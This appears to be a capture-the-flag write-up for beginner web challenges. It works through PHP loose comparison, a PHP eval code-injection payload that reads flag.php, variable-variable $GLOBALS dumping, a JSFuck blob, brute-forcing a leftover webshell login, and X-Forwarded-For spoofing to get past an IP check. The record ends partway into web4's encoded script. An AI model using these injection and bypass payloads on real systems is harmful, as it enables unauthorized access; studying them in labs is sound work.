web2

Press F12 and look at the page source: the flag is inside an HTML comment.

Calculator (计算器)

Just evaluate the expression the page gives you.

The catch is that the input field has a maximum length that is shorter than the answer. Either edit the maxlength attribute in the F12 inspector or capture the request in Burp and change the value there; the limit is only enforced client-side.

Web basics: $_GET (web基础$_GET)

$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

Pass ?what=flag in the address bar.

Web basics: $_POST (web基础$_POST)

$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

Use Firefox's HackBar extension to send a POST parameter what=flag.

Contradiction (矛盾)

$num=$_GET['num'];
if(!is_numeric($num))
{
    echo $num;
    if($num==1)
        echo 'flag{**********}';
}

The value must fail is_numeric() and still be == 1. This is PHP's loose == at work: it only compares values, and when the operands have different types it converts before comparing. A string such as 1a compared with the integer 1 is converted to its leading number, so 1a == 1 holds, while is_numeric('1a') is false. ?num=1a satisfies both branches. This is a consequence of PHP being weakly typed; note that since PHP 8 a non-numeric string compared with an int is compared as strings, so the trick works on the PHP 5/7 the challenge runs, not on current PHP.

PHP weak typing (php弱类型)

Weak typing means a variable is declared without a type, for example:

$a=1

$b='1'

Normally $a is parsed as an int and $b as a string. That looks convenient, but it causes trouble as soon as two variables are compared: $a==$b returns true, and every check built on == inherits that looseness.

Some loose-comparison results (as observed on PHP 5; see the notes after each line):

"0e132456789"=="0e7124511451155"   //true   both are numeric strings and both equal 0
"0e123456abc"=="0e1dddada"         //false  neither is numeric, so they are compared as strings
"0e1abc"==0                        //true   the leading "0e1" converts to 0 (false since PHP 8)
"0x1e240"=="123456"                //true   hex strings counted as numeric in PHP 5 (false since PHP 7)
"0x1e240"==123456                  //true   same reason (false since PHP 7)
"0x1e240"=="1e240"                 //false  0x1e240 is 123456, 1e240 is a much larger number

So if a server stores a password hash and the stored value happens to look like 0e followed only by digits, that hash is a numeric string equal to 0, and == treats it as equal to "0" and to every other hash of that shape.

Use === for comparisons wherever possible: it checks the type as well as the value, so none of the conversions above happen.
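To make the rules above concrete, here is an added Python model of PHP's loose == for strings and numbers. It is my own illustration, not code from the challenge or from PHP itself: it follows the PHP 7 rules, has a flag for the PHP 8 change, and includes the check for 0e-style "magic" MD5 hashes that several later levels rely on. The strings s878926199a and s155964671a are the well-known magic pair listed further down in this writeup.

```python
import hashlib
import re

# Shape of a PHP "numeric string": optional sign, digits or a decimal, optional exponent.
# Hex strings ("0x1e240") stopped being numeric in PHP 7, so they are excluded here.
_NUMERIC = re.compile(r'^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?\s*$')
# Leading-numeric prefix, which PHP 7 silently uses when it converts "0e1abc" to 0.
_LEADING = re.compile(r'^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?')


def is_numeric_string(s: str) -> bool:
    """Mirror of PHP's is_numeric() for strings (PHP 7 rules)."""
    return _NUMERIC.match(s) is not None


def to_number(s: str) -> float:
    """PHP's string-to-number conversion: the leading numeric prefix, else 0."""
    m = _LEADING.match(s)
    return float(m.group(0)) if m else 0.0


def php_loose_eq(a, b, php8: bool = False) -> bool:
    """Model of PHP's == for strings and numbers.

    PHP 7: two numeric strings are compared as numbers; a string compared with a
    number is first converted to a number (a non-numeric string becomes 0).
    PHP 8: a non-numeric string compared with a number turns the number into a
    string instead, which is why "0e1abc" == 0 flipped from true to false.
    """
    if isinstance(a, str) and isinstance(b, str):
        if is_numeric_string(a) and is_numeric_string(b):
            return to_number(a) == to_number(b)
        return a == b
    if isinstance(a, str) or isinstance(b, str):
        s, n = (a, b) if isinstance(a, str) else (b, a)
        if php8 and not is_numeric_string(s):
            return s == str(n)
        return to_number(s) == float(n)
    return a == b


_MAGIC = re.compile(r'^0e\d+$')


def is_magic_hash(hexdigest: str) -> bool:
    """True if the hash is '0e' followed only by digits: a numeric string equal to 0."""
    return _MAGIC.match(hexdigest) is not None


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def md5_loose_collides(a: str, b: str) -> bool:
    """The condition many challenges check: md5($a) == md5($b) while $a != $b."""
    return a != b and php_loose_eq(md5_hex(a), md5_hex(b))
```

php_loose_eq("0x1e240", "123456") returns False here because the model follows PHP 7; on PHP 5 the same comparison was true, as the table above records.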

web3

The page keeps popping up dialogs; disable JavaScript (Firefox can also block further dialogs from the page).

In the F12 inspector the script contains an encoded string. It is HTML entity encoding (&#...; sequences); run it through a decoder and the flag comes out.

Domain resolution (域名解析)

Edit the hosts file on your machine (/etc/hosts on Linux, C:\Windows\System32\drivers\etc\hosts on Windows) and map the hostname to the challenge IP:

# localhost name resolution is handled within DNS itself.
#   127.0.0.1       localhost
#   ::1             localhost
123.206.87.240        flag.baidu.com

Then browse to flag.baidu.com and the flag is shown. The server is selecting the virtual host from the Host header, so sending the request with Host: flag.baidu.com from Burp or curl works just as well.

You must make it stop (你必须让他停下)

The page keeps redirecting to itself. The source shows why:

<script language="JavaScript">
function myrefresh(){window.location.reload();
}
setTimeout('myrefresh()',500);
</script>

Send the request to Burp Repeater and keep clicking Go: the content differs between responses, and one of them contains the flag.

Local include (本地包含)

<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>

$_REQUEST

By default it merges the $_GET, $_POST and $_COOKIE arrays, so hello can arrive by any of them.

eval()

eval() evaluates a string as PHP code. The string must be valid PHP and must end with a semicolon.

Note: a return statement inside the string ends the evaluation immediately.

Tip: the documented use is code stored in database text fields for later execution. Here it means whatever lands in $a is interpolated directly into the code that runs.

Close the var_dump() call and append a second statement that prints flag.php: ?hello=1);print_r(file("./flag.php") turns the evaluated string into var_dump(1);print_r(file("./flag.php")); and the file's lines are printed.

Variable 1 (变量1)

<?php
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){
        die("args error!");
    }
    eval("var_dump($$args);");
}
?>

The regex in the if only allows args made of letters, digits and underscores, so no quotes or parentheses get through. But $$args is a variable variable: the value of args names the variable to dump. Ask for the superglobal that holds every global, including whatever flag1.php defined:

http://123.206.87.240:8004/index1.php?args=GLOBALS

The dump of $GLOBALS contains

 ["ZFkwe3"]=> string(38) "flag{92853051ab894a64f7865cf3c2128b34}"

so the flag is the value of the global variable ZFkwe3.

web5

View the source; hidden in a display:none div is this:

<div style="display:none;">([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+!+[]]]+(+(!+[]+!+[]+!+[]+[!+[]+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[
]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]+!+[]])+(+(+!+[]+[+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[])[+[]]+(+(!+[]+!+[]+[+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(
[![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+[+!+[]])+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[
+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+!+[]]]+([][[]]+[])[+[]]+([][[]]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+
[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]
])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()(([]+[])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]
]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+[]])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]])</div>

That is JSFuck, JavaScript written with only six characters. Paste it into the browser console and press Enter: it evaluates to ctf{whatfk}, and the flag is that string in uppercase.

First class (头等舱)

Nothing on the page, and the request captured in Burp looks ordinary too. Send it from Repeater and the flag shows up in the response headers.

The site was hacked (网站被黑)

A directory scan with 御剑 finds http://123.206.87.240:8002/webshell/shell.php.

It is the login page of a webshell left behind. Brute-forcing its password quickly turns up hack, and logging in gives the flag.

Admin system (管理员系统)

At first this looked like an injection challenge; after a few attempts the login responds with:

IP禁止访问,请联系本地管理员登陆,IP已被记录. (Access from this IP is forbidden; contact the local administrator to log in. Your IP has been recorded.)

F12 shows a base64 string in the source; it decodes to test123.

Guess that this is the password,

and that the admin account is admin.

Now Burp:

add X-FORWARDED-FOR:127.0.0.1 to the request headers so the application believes the request comes from the local machine,

and the flag is returned.

web4

The hint says view the source:

<script>
var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
